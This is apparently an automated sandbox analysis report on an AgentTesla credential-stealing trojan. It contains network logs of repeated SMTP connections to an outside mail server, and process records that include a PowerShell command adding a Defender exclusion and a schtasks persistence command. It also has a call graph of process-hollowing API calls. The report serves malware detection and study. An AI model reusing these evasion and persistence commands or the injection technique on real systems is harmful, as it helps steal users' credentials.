                                                      Apr 3, 2024 06:22:04.989509106 CEST5874973789.249.49.141192.168.2.7220-nl9.nlkoddos.com ESMTP Exim 4.96.2 #2 Wed, 03 Apr 2024 06:22:04 +0200
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 3, 2024 06:22:04.991669893 CEST49737587192.168.2.789.249.49.141EHLO 768287
                                                      Apr 3, 2024 06:22:05.233120918 CEST5874973789.249.49.141192.168.2.7250-nl9.nlkoddos.com Hello 768287 [102.129.152.231]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 3, 2024 06:22:05.233434916 CEST49737587192.168.2.789.249.49.141STARTTLS
                                                      Apr 3, 2024 06:22:05.589921951 CEST5874973789.249.49.141192.168.2.7220 TLS go ahead
                                                      Apr 3, 2024 06:22:08.509044886 CEST5874973789.249.49.141192.168.2.7421 Lost incoming connection
                                                      Apr 3, 2024 06:22:08.595586061 CEST5874973889.249.49.141192.168.2.7220-nl9.nlkoddos.com ESMTP Exim 4.96.2 #2 Wed, 03 Apr 2024 06:22:07 +0200
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 3, 2024 06:22:08.595885992 CEST49738587192.168.2.789.249.49.141EHLO 768287
                                                      Apr 3, 2024 06:22:08.840902090 CEST5874973889.249.49.141192.168.2.7250-nl9.nlkoddos.com Hello 768287 [102.129.152.231]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 3, 2024 06:22:08.841203928 CEST49738587192.168.2.789.249.49.141STARTTLS
                                                      Apr 3, 2024 06:22:09.159708023 CEST5874973889.249.49.141192.168.2.7220 TLS go ahead
                                                      Apr 3, 2024 06:22:14.079823017 CEST5874973989.249.49.141192.168.2.7220-nl9.nlkoddos.com ESMTP Exim 4.96.2 #2 Wed, 03 Apr 2024 06:22:13 +0200
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 3, 2024 06:22:14.079951048 CEST49739587192.168.2.789.249.49.141EHLO 768287
                                                      Apr 3, 2024 06:22:14.319139957 CEST5874973989.249.49.141192.168.2.7250-nl9.nlkoddos.com Hello 768287 [102.129.152.231]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 3, 2024 06:22:14.325510025 CEST49739587192.168.2.789.249.49.141STARTTLS
                                                      Apr 3, 2024 06:22:14.565908909 CEST5874973989.249.49.141192.168.2.7220 TLS go ahead
                                                      Apr 3, 2024 06:22:26.951925039 CEST5874974089.249.49.141192.168.2.7220-nl9.nlkoddos.com ESMTP Exim 4.96.2 #2 Wed, 03 Apr 2024 06:22:25 +0200
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 3, 2024 06:22:26.952212095 CEST49740587192.168.2.789.249.49.141EHLO 768287
                                                      Apr 3, 2024 06:22:27.135169029 CEST5874974189.249.49.141192.168.2.7220-nl9.nlkoddos.com ESMTP Exim 4.96.2 #2 Wed, 03 Apr 2024 06:22:26 +0200
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 3, 2024 06:22:27.137509108 CEST49741587192.168.2.789.249.49.141EHLO 768287
                                                      Apr 3, 2024 06:22:27.190140963 CEST5874974089.249.49.141192.168.2.7250-nl9.nlkoddos.com Hello 768287 [102.129.152.231]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 3, 2024 06:22:27.193839073 CEST49740587192.168.2.789.249.49.141STARTTLS
                                                      Apr 3, 2024 06:22:27.377029896 CEST5874974189.249.49.141192.168.2.7250-nl9.nlkoddos.com Hello 768287 [102.129.152.231]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 3, 2024 06:22:27.377177000 CEST49741587192.168.2.789.249.49.141STARTTLS
                                                      Apr 3, 2024 06:22:27.432549953 CEST5874974089.249.49.141192.168.2.7220 TLS go ahead
                                                      Apr 3, 2024 06:22:27.625013113 CEST5874974189.249.49.141192.168.2.7220 TLS go ahead
                                                      Apr 3, 2024 06:22:35.569605112 CEST5874974289.249.49.141192.168.2.7220-nl9.nlkoddos.com ESMTP Exim 4.96.2 #2 Wed, 03 Apr 2024 06:22:34 +0200
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 3, 2024 06:22:35.569715023 CEST49742587192.168.2.789.249.49.141EHLO 768287
                                                      Apr 3, 2024 06:22:35.812403917 CEST5874974289.249.49.141192.168.2.7250-nl9.nlkoddos.com Hello 768287 [102.129.152.231]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 3, 2024 06:22:35.812772989 CEST49742587192.168.2.789.249.49.141STARTTLS
                                                      Apr 3, 2024 06:22:36.055329084 CEST5874974289.249.49.141192.168.2.7220 TLS go ahead
                                                      Apr 3, 2024 06:22:50.492449999 CEST5874974389.249.49.141192.168.2.7220-nl9.nlkoddos.com ESMTP Exim 4.96.2 #2 Wed, 03 Apr 2024 06:22:49 +0200
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 3, 2024 06:22:50.492599010 CEST49743587192.168.2.789.249.49.141EHLO 768287
                                                      Apr 3, 2024 06:22:50.738662958 CEST5874974389.249.49.141192.168.2.7250-nl9.nlkoddos.com Hello 768287 [102.129.152.231]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 3, 2024 06:22:50.745513916 CEST49743587192.168.2.789.249.49.141STARTTLS
                                                      Apr 3, 2024 06:22:50.986445904 CEST5874974389.249.49.141192.168.2.7220 TLS go ahead
                                                      Apr 3, 2024 06:22:58.146754980 CEST5874974489.249.49.141192.168.2.7220-nl9.nlkoddos.com ESMTP Exim 4.96.2 #2 Wed, 03 Apr 2024 06:22:57 +0200
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 3, 2024 06:22:58.146910906 CEST49744587192.168.2.789.249.49.141EHLO 768287
                                                      Apr 3, 2024 06:22:58.403587103 CEST5874974489.249.49.141192.168.2.7250-nl9.nlkoddos.com Hello 768287 [102.129.152.231]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 3, 2024 06:22:58.409550905 CEST49744587192.168.2.789.249.49.141STARTTLS
                                                      Apr 3, 2024 06:22:58.699352026 CEST5874974489.249.49.141192.168.2.7220 TLS go ahead
                                                      Apr 3, 2024 06:23:10.252260923 CEST5874974589.249.49.141192.168.2.7220-nl9.nlkoddos.com ESMTP Exim 4.96.2 #2 Wed, 03 Apr 2024 06:23:09 +0200
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 3, 2024 06:23:10.252388954 CEST49745587192.168.2.789.249.49.141EHLO 768287
                                                      Apr 3, 2024 06:23:10.493032932 CEST5874974589.249.49.141192.168.2.7250-nl9.nlkoddos.com Hello 768287 [102.129.152.231]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 3, 2024 06:23:10.495677948 CEST49745587192.168.2.789.249.49.141STARTTLS
                                                      Apr 3, 2024 06:23:10.741054058 CEST5874974589.249.49.141192.168.2.7220 TLS go ahead
                                                      Apr 3, 2024 06:23:11.984361887 CEST5874974689.249.49.141192.168.2.7220-nl9.nlkoddos.com ESMTP Exim 4.96.2 #2 Wed, 03 Apr 2024 06:23:11 +0200
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 3, 2024 06:23:11.984579086 CEST5874974689.249.49.141192.168.2.7421 nl9.nlkoddos.com lost input connection
                                                      Apr 3, 2024 06:23:12.610307932 CEST5874974789.249.49.141192.168.2.7220-nl9.nlkoddos.com ESMTP Exim 4.96.2 #2 Wed, 03 Apr 2024 06:23:11 +0200
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 3, 2024 06:23:12.612093925 CEST49747587192.168.2.789.249.49.141EHLO 768287
                                                      Apr 3, 2024 06:23:12.850752115 CEST5874974789.249.49.141192.168.2.7250-nl9.nlkoddos.com Hello 768287 [102.129.152.231]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 3, 2024 06:23:12.850918055 CEST49747587192.168.2.789.249.49.141STARTTLS
                                                      Apr 3, 2024 06:23:13.089771032 CEST5874974789.249.49.141192.168.2.7220 TLS go ahead
                                                      Apr 3, 2024 06:23:14.968626976 CEST5874974889.249.49.141192.168.2.7220-nl9.nlkoddos.com ESMTP Exim 4.96.2 #2 Wed, 03 Apr 2024 06:23:13 +0200
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 3, 2024 06:23:18.272713900 CEST49748587192.168.2.789.249.49.141EHLO 768287
                                                      Apr 3, 2024 06:23:18.518604994 CEST5874974889.249.49.141192.168.2.7250-nl9.nlkoddos.com Hello 768287 [102.129.152.231]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 3, 2024 06:23:18.518621922 CEST5874974889.249.49.141192.168.2.7421 nl9.nlkoddos.com lost input connection
                                                      Apr 3, 2024 06:23:18.616508961 CEST5874974789.249.49.141192.168.2.7421 Lost incoming connection
                                                      Apr 3, 2024 06:23:18.848602057 CEST5874974989.249.49.141192.168.2.7220-nl9.nlkoddos.com ESMTP Exim 4.96.2 #2 Wed, 03 Apr 2024 06:23:17 +0200
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 3, 2024 06:23:18.851506948 CEST49749587192.168.2.789.249.49.141EHLO 768287
                                                      Apr 3, 2024 06:23:18.954503059 CEST5874975089.249.49.141192.168.2.7220-nl9.nlkoddos.com ESMTP Exim 4.96.2 #2 Wed, 03 Apr 2024 06:23:17 +0200
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 3, 2024 06:23:18.954696894 CEST49750587192.168.2.789.249.49.141EHLO 768287
                                                      Apr 3, 2024 06:23:19.088932991 CEST5874974989.249.49.141192.168.2.7250-nl9.nlkoddos.com Hello 768287 [102.129.152.231]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 3, 2024 06:23:19.089246988 CEST49749587192.168.2.789.249.49.141STARTTLS
                                                      Apr 3, 2024 06:23:19.195015907 CEST5874975089.249.49.141192.168.2.7250-nl9.nlkoddos.com Hello 768287 [102.129.152.231]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 3, 2024 06:23:19.195259094 CEST49750587192.168.2.789.249.49.141STARTTLS
                                                      Apr 3, 2024 06:23:19.330836058 CEST5874974989.249.49.141192.168.2.7220 TLS go ahead
                                                      Apr 3, 2024 06:23:19.440582991 CEST5874975089.249.49.141192.168.2.7220 TLS go ahead

                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:06:19:06
                                                      Start date:03/04/2024
                                                      Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe"
                                                      Imagebase:0x460000
                                                      File size:736'776 bytes
                                                      MD5 hash:AA4E9485A220716BCA4854AC0007A125
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1250066076.000000000393E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1250066076.000000000393E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:3
                                                      Start time:06:19:08
                                                      Start date:03/04/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe"
                                                      Imagebase:0xea0000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:4
                                                      Start time:06:19:08
                                                      Start date:03/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff75da10000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:5
                                                      Start time:06:19:08
                                                      Start date:03/04/2024
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tXBTtgndxsp" /XML "C:\Users\user\AppData\Local\Temp\tmpD46C.tmp"
                                                      Imagebase:0x4a0000
                                                      File size:187'904 bytes
                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:6
                                                      Start time:06:19:08
                                                      Start date:03/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff75da10000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:7
                                                      Start time:06:19:09
                                                      Start date:03/04/2024
                                                      Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe"
                                                      Imagebase:0xab0000
                                                      File size:736'776 bytes
                                                      MD5 hash:AA4E9485A220716BCA4854AC0007A125
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.3700297871.0000000002EED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.3700297871.0000000002EE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.3700297871.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.3700297871.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:false

                                                      General

                                                      Target ID:8
                                                      Start time:06:19:09
                                                      Start date:03/04/2024
                                                      Path:C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe
                                                      Imagebase:0xeb0000
                                                      File size:736'776 bytes
                                                      MD5 hash:AA4E9485A220716BCA4854AC0007A125
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 16%, ReversingLabs
                                                      • Detection: 32%, Virustotal, Browse
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:9
                                                      Start time:06:19:10
                                                      Start date:03/04/2024
                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                      Imagebase:0x7ff7fb730000
                                                      File size:496'640 bytes
                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:18
                                                      Start time:06:19:13
                                                      Start date:03/04/2024
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tXBTtgndxsp" /XML "C:\Users\user\AppData\Local\Temp\tmpE610.tmp"
                                                      Imagebase:0x4a0000
                                                      File size:187'904 bytes
                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:19
                                                      Start time:06:19:13
                                                      Start date:03/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff75da10000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:20
                                                      Start time:06:19:13
                                                      Start date:03/04/2024
                                                      Path:C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe"
                                                      Imagebase:0x840000
                                                      File size:736'776 bytes
                                                      MD5 hash:AA4E9485A220716BCA4854AC0007A125
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.3700333358.0000000002C8B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.3688800545.0000000000426000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.3688800545.0000000000426000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:false

                                                      General

                                                      Target ID:21
                                                      Start time:06:19:15
                                                      Start date:03/04/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                                                      Imagebase:0x7ff7b4ee0000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:11.3%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:189
                                                        Total number of Limit Nodes:13
                                                        execution_graph 20498 4c84668 20499 4c84672 20498->20499 20501 4c84758 20498->20501 20502 4c8477d 20501->20502 20506 4c84858 20502->20506 20510 4c84868 20502->20510 20508 4c8488f 20506->20508 20507 4c8496c 20507->20507 20508->20507 20514 4c844b0 20508->20514 20512 4c8488f 20510->20512 20511 4c8496c 20511->20511 20512->20511 20513 4c844b0 CreateActCtxA 20512->20513 20513->20511 20515 4c858f8 CreateActCtxA 20514->20515 20517 4c859bb 20515->20517 20544 4c8d938 20545 4c8d97a 20544->20545 20546 4c8d980 GetModuleHandleW 20544->20546 20545->20546 20547 4c8d9ad 20546->20547 20518 6a5ab40 20519 6a5accb 20518->20519 20521 6a5ab66 20518->20521 20521->20519 20522 6a5a730 20521->20522 20523 6a5adc0 PostMessageW 20522->20523 20525 6a5ae2c 20523->20525 20525->20521 20526 4c8d9e0 20527 4c8d9f4 20526->20527 20528 4c8da19 20527->20528 20530 4c8cad0 20527->20530 20531 4c8dbc0 LoadLibraryExW 20530->20531 20533 4c8dc39 20531->20533 20533->20528 20534 4c8f9e0 20535 4c8fa26 GetCurrentProcess 20534->20535 20537 4c8fa78 GetCurrentThread 20535->20537 20540 4c8fa71 20535->20540 20538 4c8fab5 GetCurrentProcess 20537->20538 20541 4c8faae 20537->20541 20539 4c8faeb GetCurrentThreadId 20538->20539 20543 4c8fb44 20539->20543 20540->20537 20541->20538 20548 6a572de 20550 6a56f4e 20548->20550 20549 6a56f63 20550->20549 20554 6a59596 20550->20554 20560 6a59530 20550->20560 20565 6a59521 20550->20565 20555 6a59524 20554->20555 20557 6a59599 20554->20557 20570 6a59851 20555->20570 20588 6a59860 20555->20588 20556 6a59552 20556->20549 20561 6a5954a 20560->20561 20563 6a59851 12 API calls 20561->20563 20564 6a59860 12 API calls 20561->20564 20562 6a59552 20562->20549 20563->20562 20564->20562 20566 6a59524 20565->20566 20568 6a59851 12 API calls 20566->20568 20569 6a59860 12 API calls 20566->20569 20567 6a59552 20567->20549 20568->20567 20569->20567 20571 6a59875 20570->20571 20606 6a5a0ec 20571->20606 20613 6a59dad 20571->20613 20618 6a59a64 20571->20618 20623 6a59d45 20571->20623 20632 6a59c5b 20571->20632 20637 6a5a09e 20571->20637 20641 6a599de 20571->20641 20648 6a59b13 20571->20648 20653 6a59c31 20571->20653 20658 6a5a011 20571->20658 20663 6a59976 20571->20663 20671 6a59d97 20571->20671 20676 6a59f14 20571->20676 20682 6a59bd5 20571->20682 20686 6a59acb 20571->20686 20572 6a59887 20572->20556 20589 6a59875 20588->20589 20591 6a59d45 4 API calls 20589->20591 20592 6a59a64 2 API calls 20589->20592 20593 6a59dad 2 API calls 20589->20593 20594 6a5a0ec 2 API calls 20589->20594 20595 6a59acb 2 API calls 20589->20595 20596 6a59bd5 2 API calls 20589->20596 20597 6a59f14 2 API calls 20589->20597 20598 6a59d97 2 API calls 20589->20598 20599 6a59976 4 API calls 20589->20599 20600 6a5a011 2 API calls 20589->20600 20601 6a59c31 2 API calls 20589->20601 20602 6a59b13 2 API calls 20589->20602 20603 6a599de 4 API calls 20589->20603 20604 6a5a09e 2 API calls 20589->20604 20605 6a59c5b 2 API calls 20589->20605 20590 6a59887 20590->20556 20591->20590 20592->20590 20593->20590 20594->20590 20595->20590 20596->20590 20597->20590 20598->20590 20599->20590 20600->20590 20601->20590 20602->20590 20603->20590 20604->20590 20605->20590 20611 6a5a5e0 2 API calls 20606->20611 20696 6a5a5f0 20606->20696 20607 6a5a215 20607->20572 20608 6a59b0f 20608->20607 20610 6a5a5f0 2 API calls 20608->20610 20691 6a5a5e0 20608->20691 20610->20608 20611->20608 20614 6a59d4c 20613->20614 20709 6a567f0 20614->20709 20713 6a567e8 20614->20713 20615 6a5a146 20619 6a59a70 20618->20619 20620 6a59a82 20619->20620 20717 6a569a0 20619->20717 20721 6a56998 20619->20721 20620->20572 20624 6a59d4b 20623->20624 20625 6a59add 20624->20625 20627 6a59a70 20624->20627 20725 6a56230 20625->20725 20729 6a5622b 20625->20729 20626 6a59a82 20626->20572 20627->20626 20630 6a569a0 ReadProcessMemory 20627->20630 20631 6a56998 ReadProcessMemory 20627->20631 20630->20627 20631->20627 20635 6a569a0 ReadProcessMemory 20632->20635 20636 6a56998 ReadProcessMemory 20632->20636 20633 6a59a82 20633->20572 20634 6a59a70 20634->20632 20634->20633 20635->20634 20636->20634 20639 6a562e0 Wow64SetThreadContext 20637->20639 20640 6a562d8 Wow64SetThreadContext 20637->20640 20638 6a5a0b8 20639->20638 20640->20638 20733 6a56b2c 20641->20733 20737 6a56b38 20641->20737 20649 6a59b2d 20648->20649 20651 6a56230 ResumeThread 20649->20651 20652 6a5622b ResumeThread 20649->20652 20650 6a59b42 20650->20572 20650->20650 20651->20650 20652->20650 20654 6a59c54 20653->20654 20741 6a568b0 20654->20741 20745 6a568a8 20654->20745 20655 6a5a24a 20660 6a5a017 20658->20660 20659 6a5a07e 20661 6a568b0 WriteProcessMemory 20660->20661 20662 6a568a8 WriteProcessMemory 20660->20662 20661->20659 20662->20659 20664 6a59980 20663->20664 20665 6a59a14 20664->20665 20669 6a56b2c CreateProcessA 20664->20669 20670 6a56b38 CreateProcessA 20664->20670 20666 6a59a82 20665->20666 20667 6a569a0 ReadProcessMemory 20665->20667 20668 6a56998 ReadProcessMemory 20665->20668 20666->20572 20667->20665 20668->20665 20669->20665 20670->20665 20673 6a59b0f 20671->20673 20672 6a5a215 20672->20572 20673->20672 20674 6a5a5e0 2 API calls 20673->20674 20675 6a5a5f0 2 API calls 20673->20675 20674->20673 20675->20673 20677 6a59b2d 20676->20677 20678 6a5a0e4 20677->20678 20680 6a56230 ResumeThread 20677->20680 20681 6a5622b ResumeThread 20677->20681 20678->20572 20679 6a59b42 20679->20572 20679->20679 20680->20679 20681->20679 20684 6a568b0 WriteProcessMemory 20682->20684 20685 6a568a8 WriteProcessMemory 20682->20685 20683 6a59bf9 20683->20572 20684->20683 20685->20683 20687 6a59af4 20686->20687 20689 6a56230 ResumeThread 20687->20689 20690 6a5622b ResumeThread 20687->20690 20688 6a59b42 20688->20572 20688->20688 20689->20688 20690->20688 20692 6a5a605 20691->20692 20701 6a562e0 20692->20701 20705 6a562d8 20692->20705 20693 6a5a61b 20693->20608 20697 6a5a605 20696->20697 20699 6a562e0 Wow64SetThreadContext 20697->20699 20700 6a562d8 Wow64SetThreadContext 20697->20700 20698 6a5a61b 20698->20608 20699->20698 20700->20698 20702 6a56325 Wow64SetThreadContext 20701->20702 20704 6a5636d 20702->20704 20704->20693 20706 6a562e0 Wow64SetThreadContext 20705->20706 20708 6a5636d 20706->20708 20708->20693 20710 6a567f4 VirtualAllocEx 20709->20710 20712 6a5686d 20710->20712 20712->20615 20714 6a567f0 VirtualAllocEx 20713->20714 20716 6a5686d 20714->20716 20716->20615 20718 6a569a4 ReadProcessMemory 20717->20718 20720 6a56a2f 20718->20720 20720->20619 20722 6a5699e ReadProcessMemory 20721->20722 20724 6a56a2f 20722->20724 20724->20619 20726 6a56270 ResumeThread 20725->20726 20728 6a562a1 20726->20728 20728->20626 20730 6a56230 ResumeThread 20729->20730 20732 6a562a1 20730->20732 20732->20626 20734 6a56bc1 CreateProcessA 20733->20734 20736 6a56d83 20734->20736 20736->20736 20738 6a56bc1 CreateProcessA 20737->20738 20740 6a56d83 20738->20740 20740->20740 20742 6a568f8 WriteProcessMemory 20741->20742 20744 6a5694f 20742->20744 20744->20655 20746 6a568f8 WriteProcessMemory 20745->20746 20748 6a5694f 20746->20748 20748->20655

                                                        Executed Functions

                                                        Function 04C83E28 Relevance: 6.7, Strings: 5, Instructions: 411COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
